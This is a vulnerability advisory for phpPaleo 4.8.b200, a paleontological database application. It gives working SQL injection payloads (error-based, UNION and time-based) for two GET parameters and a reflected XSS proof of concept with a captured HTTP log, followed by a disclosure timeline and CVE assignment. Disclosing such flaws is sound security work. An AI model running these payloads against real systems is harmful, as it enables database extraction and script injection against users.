phpPaleo version 4.8.b200 is vulnerable to Reflective Cross Site Scripting (XSS) as well as Error, Union and Time based, Structured Query Language Injection (SQLi).
Software Description
phpPaleo 4 is an open source PHP project that manage a paleontological database.
Vulnerability Overview
The vulnerabilities POC are as follows:
Structured Query Language Injection (SQLi)
http://127.0.0.1/phppaleo/search_biblio.php?
The HTTP GET parameter 'annee=' fails to sanitise user input before passing the request to the database.
Place: GET
Parameter: annee
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: annee=2012 AND (SELECT 7789 FROM(SELECT COUNT(*),CONCAT(0x3a6466783a,(SELECT (CASE WHEN (7789=7789) THEN 1 ELSE 0 END)),0x3a7a636e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cles=1&got=0&liste=false&menu=1&nom=1&prenom=1
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: annee=2012 LIMIT 0,1 UNION ALL SELECT CONCAT(0x3a6466783a,0x564b6151507148566f44,0x3a7a636e3a),NULL,NULL#&cles=1&got=0&liste=false&menu=1&nom=1&prenom=1
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: annee=2012 AND 3532=BENCHMARK(5000000,MD5(0x7148585a))&cles=1&got=0&liste=false&menu=1&nom=1&prenom=1
http://127.0.0.1/phppaleo/search_espece.php?
The HTTP GET parameter 'texte=' fails to sanitise user input before passing the request to the database.
Place: GET
Parameter: texte
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: texte=' AND (SELECT 3222 FROM(SELECT COUNT(*),CONCAT(0x3a7166713a,(SELECT (CASE WHEN (3222=3222) THEN 1 ELSE 0 END)),0x3a786c683a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: texte=' AND 2406=BENCHMARK(5000000,MD5(0x51704142))
Reflective Cross Site Scripting
http://127.0.0.1/phppaleo/search_espece.php?
The HTTP GET parameter 'texte=' fails to sanitise user input before parsing it in the context of a user's browser.
19:43:31.002[8ms][total 8ms] Status: 200[OK]
GET http://127.0.0.1/phppaleo/search_espece.php?texte=%3Cscript%3Ealert(%27xss%27)%3C/script%3E Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[1326] Mime Type[text/html]
Request Headers:
Host[127.0.0.1]
User-Agent[Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/17.0 Firefox/17.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
Proxy-Connection[keep-alive]
Referer[http://127.0.0.1/phppaleo/menu.php]
Cookie[phppaleo4_lang=en; phppaleo4_options=geodesic%3Doff%3Bfile%3Dkml%3Bmap%3Dgoogle%3B; PHPSESSID=kkdavdn0nncu4eavqbq7oucsk1]
Response Headers:
Date[Sun, 09 Dec 2012 19:43:31 GMT]
Server[Apache/2.2.22 (Fedora)]
X-Powered-By[PHP/5.4.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Length[1326]
Connection[close]
Content-Type[text/html; charset=UTF-8
Vulnerability Timeline
7-12-12 - Developer contacted
9-12-12 - Developer re-mediated issues in phppaleo.4.10.b258.zip
21-1-13 - Mitre Assigned CVE-2013-1403 and CVE-2013-1404
21-1-13 - Mitre advised to close CVE-2013-1403 and CVE-2013-1404
21-1-13 - Vulnerabilities published.
